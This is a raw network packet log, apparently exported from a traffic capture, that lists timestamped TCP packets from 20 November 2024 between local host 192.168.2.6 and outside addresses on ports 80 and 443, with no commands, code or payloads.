                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.973328114 CET4435000413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.991642952 CET49990443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.991669893 CET4434999013.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:42.993623972 CET49997443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025028944 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025043011 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025053978 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025065899 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025077105 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025087118 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025099039 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025110960 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025121927 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025134087 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025145054 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025161982 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025163889 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025163889 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025163889 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025175095 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025187016 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025202036 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025212049 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025223017 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025233984 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025238991 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025238991 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025245905 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025260925 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025273085 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025291920 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025291920 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025291920 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025299072 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025311947 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025321960 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025332928 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025343895 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025351048 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025351048 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025355101 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025367022 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025378942 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025397062 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025408030 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025418997 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025429010 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025435925 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025435925 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025435925 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025435925 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025441885 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025454998 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025465965 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025473118 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025476933 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025489092 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025500059 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025510073 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025532007 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025536060 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025536060 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025536060 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025551081 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025563955 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025573969 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025587082 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025595903 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025605917 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025620937 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025630951 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025630951 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025630951 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025630951 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025630951 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025641918 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025655031 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025676012 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025679111 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025693893 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025706053 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025717020 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025727034 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025744915 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025751114 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025751114 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025751114 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025751114 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025755882 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025768995 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025779009 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025790930 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025800943 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025813103 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025820971 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025820971 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025820971 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025835991 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025850058 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025861979 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025873899 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025929928 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025942087 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025953054 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025960922 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025966883 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025966883 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025966883 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025966883 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025985003 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.025996923 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026006937 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026019096 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026030064 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026042938 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026082993 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026082993 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026082993 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026082993 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026122093 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026240110 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026256084 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026344061 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026355982 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026372910 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026398897 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026398897 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026400089 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026405096 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026420116 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026432037 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026444912 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026457071 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026457071 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026457071 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026530981 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026544094 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026556015 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026576042 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026578903 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026578903 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026587963 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026599884 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026612043 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026631117 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026642084 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026655912 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026662111 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026662111 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026662111 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026668072 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026683092 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026698112 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026707888 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026720047 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026738882 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026750088 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026753902 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026753902 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026753902 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026753902 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026761055 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026771069 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026772976 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026793957 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026804924 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026815891 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026824951 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026844025 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026855946 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026866913 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026876926 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026876926 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026876926 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026876926 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026879072 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026891947 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026930094 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026933908 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026947975 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.026958942 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.027017117 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.027018070 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.027018070 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.027024984 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.027044058 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.027060032 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.027070045 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.027193069 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.027193069 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.027604103 CET49993443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.027642965 CET4434999313.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.103327036 CET44349996162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.103427887 CET49996443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111012936 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111022949 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111035109 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111053944 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111064911 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111076117 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111083984 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111083984 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111170053 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111188889 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111200094 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111218929 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111232996 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111232042 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111232042 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111232042 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111246109 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111267090 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111268997 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111278057 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111290932 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111327887 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111330032 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111330032 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111339092 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111350060 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111361980 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111372948 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111373901 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111408949 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111419916 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111430883 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111440897 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111452103 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111463070 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111475945 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111479044 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111479044 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111479998 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111479998 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111509085 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111521959 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111540079 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111551046 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111551046 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111551046 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111551046 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111567974 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111578941 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111587048 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111592054 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111604929 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111618996 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111629963 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111641884 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111654043 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111685038 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111686945 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111686945 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111686945 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111687899 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111696005 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111709118 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:43.111726999 CET8049910185.215.113.206192.168.2.6
